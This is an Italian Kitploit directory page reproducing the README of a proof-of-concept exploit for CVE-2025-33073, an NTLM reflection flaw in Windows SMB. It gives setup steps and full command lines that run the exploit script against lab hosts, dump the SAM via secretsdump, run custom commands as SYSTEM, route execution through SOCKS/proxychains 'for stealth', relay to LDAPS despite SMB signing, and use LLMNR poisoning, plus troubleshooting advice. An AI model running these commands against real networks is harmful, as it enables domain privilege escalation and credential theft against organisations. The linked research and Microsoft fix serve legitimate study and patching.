Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-33073 — Exploit PoC per la vulnerabilità SMB di NTLM reflection. | Kitploit
Strumenti/GitHubGitHub/mverschu/cve-2025-33073
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingAutenticazione
GitHubmverschu/cve-2025-33073

CVE-2025-33073

Exploit PoC per la vulnerabilità SMB di NTLM reflection.

Vedi Repository
7141366 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-33073

PoC Exploit per la falla SMB di reflection NTLM.

immagine

Tutto il merito va alla ricerca ufficiale:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Prerequisiti

OS: Kali Linux (ha la maggior parte dei pacchetti preinstallati).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (incluso nella repo)

Configurazione

Lo strumento userà automaticamente un ambiente virtuale. Per configurarlo, esegui:

root@kitploit:~
./setup.sh

Questo creerà un ambiente virtuale e installerà tutte le dipendenze richieste, inclusa ldap3-bleeding-edge==2.10.1.1337.

Esempio di utilizzo

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
immagine

Comando personalizzato
Invece di eseguire secretsdump, è possibile eseguire un comando personalizzato.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

immagine

SOCKS
Per un'esecuzione più stealth dei comandi dopo aver stabilito una connessione valida come SYSTEM. --target e --target-ip devono essere uguali qui.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

immagine È anche possibile eseguire un comando personalizzato tramite proxychains invece di dumpare il SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

immagine

Exploit relay verso LDAPS anche con SMB Signing abilitato

È stata condotta una ricerca per verificare se la reflection non funzionasse davvero con SMB signing abilitato, che ha portato alla scoperta di bug per cui, se SIGN/SEAL vengono rimossi dal pacchetto, è possibile fare relay da SMB a LDAPS, cosa solitamente non possibile a causa del MIC.

Ringraziamenti a:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
immagine

Exploit manuale senza requisito DNS

Se ti trovi nello stesso dominio broadcast del dispositivo ed è vulnerabile all'avvelenamento LLMNR, è possibile sfruttare un dispositivo senza dover registrare un record DNS.

immagine

Risoluzione dei problemi

  • A volte l'attacco non funziona perché viene usato l'hostname per l'attacco, il che comporta una risoluzione DNS da parte di Kali. Se Kali non sta usando il server DNS o ricevi un messaggio '/ FAILED' da impacket-ntlmrelayx, prova ad aggiungere l'host al tuo file /etc/hosts. Questo dovrebbe far funzionare l'attacco.
  • Se usi l'IP l'attacco dovrebbe funzionare. A volte eseguirlo più volte porta a un SUCCESS invece che a un fallimento. Finora non è del tutto chiaro perché succeda. Penso abbia a che fare con la rete.
  • Prova un altro metodo di coerce usando -M o --method.

Wireshark

L'autenticazione NTLM locale avviene immagine

L'autenticazione NTLM locale non avviene, portando a un tentativo FAILED immagine

Da sapere

  • Il record DNS dovrebbe essere noto anche al client; in alcuni casi può richiedere più tempo. Con più tempo intendo qualche minuto.
  • Questo è solo un PoC, il che significa che non è stato tentato alcun bypass di AV/EDR. Usalo a tuo rischio.

Come risolvere

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Scarica lo strumento